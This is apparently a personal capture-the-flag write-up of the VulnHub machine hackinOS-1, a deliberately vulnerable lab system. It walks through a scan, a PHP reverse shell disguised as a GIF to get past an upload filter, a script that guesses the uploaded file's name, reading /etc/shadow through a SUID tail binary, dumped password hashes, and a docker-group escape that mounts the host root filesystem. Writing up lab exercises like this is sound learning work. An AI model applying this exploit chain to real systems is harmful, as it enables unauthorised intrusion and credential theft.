https://www.vulnhub.com/entry/hackinos-1,295/
running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip.
i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.
nikto revealed some interesting infos:
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
—————————————————————————
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.101:8000/
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Entry ‘/upload.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header ‘link’ found, with contents: ; rel=”https://api.w.org/”
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
—————————————————————————
+ 1 host(s) tested
the /upload.php is interesting, its an image upload function. i started uploading with php reverse shells infected png images. That didnt work out.
Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25
🙂
At some point i found the hint hidden in the html code <– https://github.com/fatihhcelik/Vulnerable-Machine—Hint –>
That revealed the upload.php’s code:
That makes it a lot easier. We can see that the file ist renamed to the md5 of the filename and a random number from 1-100.
The script checks the mime type of the uploaded file but no extension, allowed are gif and png mime types.
So i created a random png image with gimp and opened it with hex editor, put a a php reverse shell in it. upload wont work -.- after learning and experimenting i found a gif working like that:
cat cmd.php
GIF89a;
#
now we get to launch the shell and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.phpXXX
#!/usr/bin/python3
import hashlib
textToEncode = input()
bisHundert = 1
toEncode = textToEncode+str(bisHundert)
while bisHundert<=100:
print(hashlib.md5(toEncode.encode('utf-8')).hexdigest())
bisHundert += 1
toEncode = textToEncode+str(bisHundert)
$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
cmd.php
thomsane@anansi:~/python$ cat cmdphphashes.txt
04292b8d46833c395942086e6ed2cd2c
d44843c7108897d25a243ffc3cd1edb7
(…)
180134430544955d54b576c726c76217
now we can supply wfuzz with the payloads stored in the textfile.
$ sudo wfuzz -w python/cmdphphashes.txt –hc 404 http://192.168.56.101:8000/uploads/FUZZ.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.
********************************************************
* Wfuzz 2.3.4 – The Web Fuzzer *
********************************************************
Target: http://192.168.56.101:8000/uploads/FUZZ.php
Total requests: 100
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000024: C=200 3 L 16 W 165 Ch “39b07a3be178f1249b64f60105360c4b”
Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165
and it found our “picture” at
http://192.168.56.101:8000/uploads/39b07a3be178f1249b64f60105360c4b.php
and my listener received the shell 🙂 which i upgraded to a real tty with python -c ‘import pty; pty.spawn(“/bin/bash”)’ and started looking for priv esc possibilities.
i found /usr/bin/tail to have SUID bit set and tried to:
$ tail -n 100 /root/flag
Life consists of details..
well, thats not a flag right? but no permission error either since cat: /root/flag: Permission denied
tail -c1G /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
enumerating further i found $ cat /etc/init.d/delete.sh
cat /etc/init.d/delete.sh
#!/bin/bash
while [ 1 ]
do
rm -rf /var/www/html/uploads/*.php
sleep 300
done
okay…that was the fuck keeping burp suite intruder from finding the file because of the speed throtteling in the free edition. -.-
cat wp-config.php
dumpall.sql
LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES (‘hummingbirdscyber’,’e10adc3949ba59abbe56e057f20f883e’);
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;
UNLOCK TABLES;
INSERT INTO `wp_users` VALUES (1,’Handsome_Container’,’$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0′,’handsome_container’,’pupetofosu@ask-mail.com’,”,’2019-02-23 15:49:54′,”,0,’Handsome_Container’);
hummingbirdscyber
e10adc3949ba59abbe56e057f20f883e md5 of 123456
hummingbirdscyber@vulnvm:~$
well, well, well…i was on a container before! i noticed when i looked in /var/www/html and only found an index.html. i was thinking so when i was looking on the mounts on the container…
[+] Current User
hummingbirdscyber
[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
ok, we are in the docker group…so basically root already.
lets look what containers run
hummingbirdscyber@vulnvm:~$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison 1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days 0.0.0.0:8000->80/tcp experimental_wordpress_1 81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1
since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists to elevate my privileges
hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu
now we run a a new container and the / filesystem of the main host is mounted to /hostOS
root@c50ed36b8d25:/hostOS/root# cat flag
Congratulations!
-ys-
/mms.
+NMd+`
`/so/hMMNy-
`+mMMMMMMd/ ./oso/-
`/yNMMMMMMMMNo` .` +-
.oyhMMMMMMMMMMN/. o.
`:+osysyhddhs` `o`
.:oyyhshMMMh. .:
`-//:. `:sshdh: `
-so:.
.yy.
:odh
+o--d`
/+. .d`
-/` `y`
`:` `/
`. `
that was fun 🙂 <3
